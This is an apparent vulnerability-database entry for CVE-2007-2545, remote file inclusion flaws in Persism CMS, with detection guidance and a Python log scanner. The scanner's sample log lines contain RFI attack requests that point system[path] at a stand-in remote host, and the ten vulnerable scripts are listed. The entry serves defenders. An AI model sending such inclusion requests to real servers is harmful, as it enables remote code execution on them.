CVE-2007-2545
Published 2007-05-09
Priority: P2 (60, high) · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit available
EPSS: 68.75% (99.3rd percentile)
Multiple PHP remote file inclusion vulnerabilities in Persism CMS 0.9.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the system[path] parameter to (1) blocks/headerfile.php, (2) files/blocks/latest_files.php, (3) filters/headerfile.php, (4) forums/blocks/latest_posts.php, (5) groups/headerfile.php, (6) links/blocks/links.php, (7) menu/headerfile.php, (8) news/blocks/latest_news.php, (9) settings/headerfile.php, or (10) users/headerfile.php, in modules/.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| persism_cms | persism_cms | <= 0.9.2 | — |
Detection & IOCs (extracted from sources)
- Detect HTTP requests targeting any of the vulnerable PHP scripts with a user-supplied URL in the system[path] parameter, indicating a remote file inclusion attempt.
- Monitor web server logs for GET/POST requests containing 'system[path]=' with an http:// or https:// value (a remote URL) directed at any script under the /modules/ directory tree.
- Exploitation requires the PHP 'allow_url_include' (or 'allow_url_fopen') directive to be enabled on the target server; installations with these disabled are not exploitable via this RFI vector.
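The two log-based detections above, implemented as an added example that is not part of the CVE record or of any of its sources: a small Python scanner that parses Apache/nginx "combined"-format access-log lines, URL-decodes the query string (so `system%5Bpath%5D=http%3A%2F%2F...` is caught as well as the plain form), flags any request under a `modules/` path whose `system[path]` value is an http:// or https:// URL, and marks whether the script is one of the ten named in the CVE text. The log format, the sample lines, and the 192.0.2.0/24 and 203.0.113.0/24 addresses in them are constructed for the example.

```python
import re
from urllib.parse import unquote

# The ten module scripts named in the CVE description (paths relative to modules/).
VULNERABLE_SCRIPTS = frozenset({
    "blocks/headerfile.php",
    "files/blocks/latest_files.php",
    "filters/headerfile.php",
    "forums/blocks/latest_posts.php",
    "groups/headerfile.php",
    "links/blocks/links.php",
    "menu/headerfile.php",
    "news/blocks/latest_news.php",
    "settings/headerfile.php",
    "users/headerfile.php",
})

# Apache/nginx "combined" access-log line: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# system[path]=<remote URL>; applied to the URL-decoded query string, so the
# encoded form system%5Bpath%5D=https%3A%2F%2F... matches too.
PARAM_RE = re.compile(r'(?:^|[?&])system\[path\]=(https?://[^&]*)', re.IGNORECASE)


def inspect_request(method, target):
    """Return a finding dict if the request matches the RFI pattern, else None.

    A match requires both conditions from the IoC text: the script lives under a
    modules/ directory, and system[path] carries an http:// or https:// URL.
    A local path in system[path] (normal CMS configuration) is not flagged.
    """
    path, _, query = target.partition("?")
    url_match = PARAM_RE.search(unquote(query))
    if not url_match:
        return None
    lowered = unquote(path).lower()
    idx = lowered.find("modules/")
    if idx == -1:
        return None
    script = lowered[idx + len("modules/"):]
    return {
        "method": method,
        "script": script,
        "known_vulnerable": script in VULNERABLE_SCRIPTS,
        "include_url": url_match.group(1),
    }


def scan_log(lines):
    """Parse each log line and collect RFI findings, annotated with ip/ts/status."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than fail
        finding = inspect_request(m.group("method"), m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            findings.append(finding)
    return findings


# Constructed sample log lines: two encoded/plain hits on listed scripts, one
# benign local-path value, one unrelated request, one hit on an unlisted module script.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/May/2007:10:01:22 +0000] "GET /cms/modules/blocks/headerfile.php'
    '?system[path]=http://192.0.2.10/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/May/2007:10:01:23 +0000] "GET /cms/modules/news/blocks/latest_news.php'
    '?system%5Bpath%5D=https%3A%2F%2F192.0.2.10%2Fx.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/May/2007:10:02:00 +0000] "GET /cms/modules/news/blocks/latest_news.php'
    '?system[path]=/var/www/cms/ HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/May/2007:10:02:05 +0000] "GET /cms/index.php?page=news HTTP/1.1"'
    ' 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/May/2007:10:03:10 +0000] "POST /cms/modules/custom/other.php'
    '?system[path]=http://192.0.2.10/x.txt HTTP/1.1" 404 150 "-" "curl/7.15"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        tag = "KNOWN-VULN" if f["known_vulnerable"] else "modules/ (unlisted)"
        print(f'{f["ts"]} {f["ip"]} {f["method"]} {f["script"]} -> {f["include_url"]} [{tag}] status={f["status"]}')
```

Findings on unlisted `modules/` scripts are still reported, because the second IoC bullet covers the whole directory tree; the `known_vulnerable` flag lets an analyst triage the ten named scripts first. A 200 response to one of these requests is worth more attention than a 404, but the status alone does not prove the include succeeded: that depends on the `allow_url_include`/`allow_url_fopen` setting noted in the third bullet.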
No detection rules found.
No writeups or analysis indexed.
References
- http://osvdb.org/37767
- http://osvdb.org/37768
- http://osvdb.org/37769
- http://osvdb.org/37770
- http://osvdb.org/37771
- http://osvdb.org/37772
- http://osvdb.org/37773
- http://osvdb.org/37774
- http://osvdb.org/37775
- http://osvdb.org/37776
- http://www.securityfocus.com/bid/23828
- http://www.vupen.com/english/advisories/2007/1671
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34102
- https://www.exploit-db.com/exploits/3853